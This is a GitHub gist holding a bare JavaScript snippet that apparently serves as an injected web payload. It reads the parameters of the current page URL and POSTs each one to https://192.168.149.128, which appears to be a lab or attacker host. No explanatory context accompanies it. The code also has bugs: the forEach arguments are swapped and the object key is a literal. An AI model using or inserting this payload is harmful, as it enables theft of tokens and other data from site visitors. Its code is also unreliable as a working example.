Skip to content

Instantly share code, notes, and snippets.

@Katerina198b
Last active February 4, 2021 17:33
Show Gist options
  • Save Katerina198b/51ccfb51a50bbb6e3308422a1cd31330 to your computer and use it in GitHub Desktop.
Save Katerina198b/51ccfb51a50bbb6e3308422a1cd31330 to your computer and use it in GitHub Desktop.
function sendData(data) {
const xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.149.128", true);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify(data));
}
const params = new URLSearchParams(window.location.href);
params.forEach((key, value) => {
sendData({key: value})
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment